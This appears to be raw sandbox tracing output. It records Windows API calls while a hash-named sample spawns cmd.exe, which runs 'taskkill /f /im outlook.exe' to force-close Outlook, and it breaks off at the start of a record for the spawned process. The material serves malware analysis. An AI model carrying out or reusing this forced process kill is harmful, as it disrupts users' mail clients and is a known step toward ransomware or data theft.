[0214.284] GetProcessHeap () returned 0x470000 [0214.285] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x4705c8) returned 1 [0214.287] GetProcessHeap () returned 0x470000 [0214.287] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400e) returned 0x47bc50 [0214.287] GetProcessHeap () returned 0x470000 [0214.288] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4a) returned 0x47a7d0 [0214.288] GetProcessHeap () returned 0x470000 [0214.288] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4008) returned 0x47fc68 [0214.288] GetProcessHeap () returned 0x470000 [0214.288] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4008) returned 0x483c78 [0214.290] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0214.290] GetProcessHeap () returned 0x470000 [0214.290] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x418) returned 0x47a828 [0214.291] SetErrorMode (uMode=0x0) returned 0x8003 [0214.291] SetErrorMode (uMode=0x1) returned 0x0 [0214.291] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x47a830, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0214.291] SetErrorMode (uMode=0x8003) returned 0x1 [0214.293] GetProcessHeap () returned 0x470000 [0214.293] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47a828, Size=0x7c) returned 0x47a828 [0214.293] GetProcessHeap () returned 0x470000 [0214.293] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47a828) returned 0x7c [0214.294] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0214.294] GetProcessHeap () returned 0x470000 [0214.294] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x62) returned 0x47a8b0 [0214.294] GetProcessHeap () returned 0x470000 [0214.294] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb8) returned 0x47a920 [0214.294] GetProcessHeap () returned 0x470000 [0214.294] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47a920, Size=0x62) returned 0x47a920 [0214.294] GetProcessHeap () returned 0x470000 [0214.294] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47a920) returned 0x62 [0214.294] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0214.294] GetProcessHeap () returned 0x470000 [0214.294] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe0) returned 0x47a990 [0214.298] GetProcessHeap () returned 0x470000 [0214.298] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47a990, Size=0x76) returned 0x47a990 [0214.298] GetProcessHeap () returned 0x470000 [0214.298] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47a990) returned 0x76 [0214.299] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.299] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im outlook.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0214.299] GetLastError () returned 0x3 [0214.299] GetProcessHeap () returned 0x470000 [0214.300] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47fc68) returned 1 [0214.300] GetProcessHeap () returned 0x470000 [0214.300] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x483c78) returned 1 [0214.301] GetProcessHeap () returned 0x470000 [0214.301] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47bc50) returned 1 [0214.301] GetConsoleOutputCP () returned 0x1b5 [0214.303] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0214.303] GetUserDefaultLCID () returned 0x409 [0214.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0214.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0214.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0214.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0214.304] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0214.305] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0214.305] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0214.305] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0214.305] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0214.305] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0214.305] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0214.305] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0214.305] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0214.305] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0214.305] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0214.309] GetProcessHeap () returned 0x470000 [0214.309] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20c) returned 0x47aa58 [0214.309] GetConsoleTitleW (in: lpConsoleTitle=0x47aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0214.312] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0214.312] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0214.312] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0214.312] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0214.312] GetProcessHeap () returned 0x470000 [0214.312] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400a) returned 0x47bc50 [0214.312] GetProcessHeap () returned 0x470000 [0214.313] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47bc50) returned 1 [0214.314] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0214.314] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0214.314] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0214.314] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0214.314] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0214.314] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0214.314] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0214.314] GetProcessHeap () returned 0x470000 [0214.314] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x47ac70 [0214.314] GetProcessHeap () returned 0x470000 [0214.314] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1a) returned 0x470578 [0214.315] GetProcessHeap () returned 0x470000 [0214.315] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x32) returned 0x47acd0 [0214.316] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0214.317] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0214.317] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0214.317] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0214.317] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0214.317] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0214.317] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0214.318] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0214.318] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0214.318] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0214.318] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0214.318] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0214.318] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0214.318] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0214.318] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0214.318] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0214.318] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0214.318] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0214.318] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0214.318] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0214.318] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0214.318] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0214.318] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0214.318] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0214.318] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0214.318] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0214.318] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0214.318] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0214.318] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0214.318] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0214.318] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0214.318] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0214.318] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0214.318] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0214.319] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0214.319] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0214.319] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0214.319] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0214.319] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0214.319] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0214.319] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0214.319] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0214.319] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0214.319] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0214.319] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0214.319] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0214.319] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0214.319] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0214.319] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0214.319] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0214.319] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0214.319] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0214.319] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0214.319] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0214.319] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0214.319] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0214.320] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0214.320] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0214.320] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0214.320] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0214.320] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0214.320] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0214.320] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0214.320] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0214.320] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0214.320] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0214.320] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0214.320] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0214.320] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0214.320] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0214.320] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0214.320] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0214.320] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0214.320] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0214.320] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0214.320] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0214.320] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0214.320] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0214.320] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0214.320] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0214.320] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0214.320] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0214.321] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0214.321] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0214.321] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0214.321] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0214.321] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0214.321] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0214.321] GetProcessHeap () returned 0x470000 [0214.321] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x210) returned 0x47ad10 [0214.321] GetProcessHeap () returned 0x470000 [0214.321] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x44) returned 0x47af28 [0214.321] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0214.322] GetProcessHeap () returned 0x470000 [0214.322] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x418) returned 0x4705c8 [0214.322] SetErrorMode (uMode=0x0) returned 0x8003 [0214.322] SetErrorMode (uMode=0x1) returned 0x0 [0214.322] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4705d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0214.322] SetErrorMode (uMode=0x8003) returned 0x1 [0214.322] GetProcessHeap () returned 0x470000 [0214.322] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4705c8, Size=0x56) returned 0x4705c8 [0214.322] GetProcessHeap () returned 0x470000 [0214.322] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x4705c8) returned 0x56 [0214.322] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0214.322] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.323] GetProcessHeap () returned 0x470000 [0214.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x110) returned 0x47af78 [0214.323] GetProcessHeap () returned 0x470000 [0214.323] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x218) returned 0x470628 [0214.328] GetProcessHeap () returned 0x470000 [0214.328] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x470628, Size=0x112) returned 0x470628 [0214.328] GetProcessHeap () returned 0x470000 [0214.328] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x470628) returned 0x112 [0214.328] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0214.328] GetProcessHeap () returned 0x470000 [0214.328] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe0) returned 0x47b090 [0214.330] GetProcessHeap () returned 0x470000 [0214.330] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47b090, Size=0x76) returned 0x47b090 [0214.331] GetProcessHeap () returned 0x470000 [0214.331] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47b090) returned 0x76 [0214.331] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.331] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0214.331] GetLastError () returned 0x2 [0214.331] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.331] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x47b110 [0214.332] GetProcessHeap () returned 0x470000 [0214.332] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x477548 [0214.332] FindClose (in: hFindFile=0x47b110 | out: hFindFile=0x47b110) returned 1 [0214.332] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0214.332] GetLastError () returned 0x2 [0214.332] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x47b110 [0214.332] GetProcessHeap () returned 0x470000 [0214.332] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x477548, Size=0x4) returned 0x47b150 [0214.332] FindClose (in: hFindFile=0x47b110 | out: hFindFile=0x47b110) returned 1 [0214.333] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0214.333] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0214.333] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0214.335] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0214.335] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0214.335] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c)) [0214.335] GetProcessHeap () returned 0x470000 [0214.335] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x18) returned 0x477428 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.335] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0214.336] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0214.336] GetProcessHeap () returned 0x470000 [0214.336] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x477428) returned 1 [0214.336] GetProcessHeap () returned 0x470000 [0214.336] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa) returned 0x47b110 [0214.336] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.340] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im outlook.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im outlook.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im outlook.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x668, dwThreadId=0xb44)) returned 1 [0214.365] CloseHandle (hObject=0x98) returned 1 [0214.365] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.365] GetProcessHeap () returned 0x470000 [0214.365] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x479d50) returned 1 [0214.366] GetEnvironmentStringsW () returned 0x479d50* [0214.366] GetProcessHeap () returned 0x470000 [0214.366] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa76) returned 0x477cc0 [0214.366] FreeEnvironmentStringsA (penv="=") returned 1 [0214.366] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0216.053] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x0) returned 1 [0216.053] CloseHandle (hObject=0x9c) returned 1 [0216.054] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000000") returned 8 [0216.054] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.055] GetProcessHeap () returned 0x470000 [0216.056] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x477cc0) returned 1 [0216.056] GetEnvironmentStringsW () returned 0x47b160* [0216.056] GetProcessHeap () returned 0x470000 [0216.056] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa9c) returned 0x477cc0 [0216.056] FreeEnvironmentStringsA (penv="=") returned 1 [0216.056] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.056] GetProcessHeap () returned 0x470000 [0216.056] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x477cc0) returned 1 [0216.057] GetEnvironmentStringsW () returned 0x47b160* [0216.057] GetProcessHeap () returned 0x470000 [0216.057] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa9c) returned 0x477cc0 [0216.057] FreeEnvironmentStringsA (penv="=") returned 1 [0216.057] GetProcessHeap () returned 0x470000 [0216.057] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47b110) returned 1 [0216.057] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0216.057] _get_osfhandle (_FileHandle=1) returned 0x130 [0216.057] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0216.057] _get_osfhandle (_FileHandle=1) returned 0x130 [0216.057] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0216.057] _get_osfhandle (_FileHandle=0) returned 0x158 [0216.057] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0216.057] GetConsoleOutputCP () returned 0x1b5 [0216.059] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0216.059] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.063] exit (_Code=0) Thread: id = 354 os_tid = 0xee8 Process: id = "68" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2e8b0000" os_pid = "0x668" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = 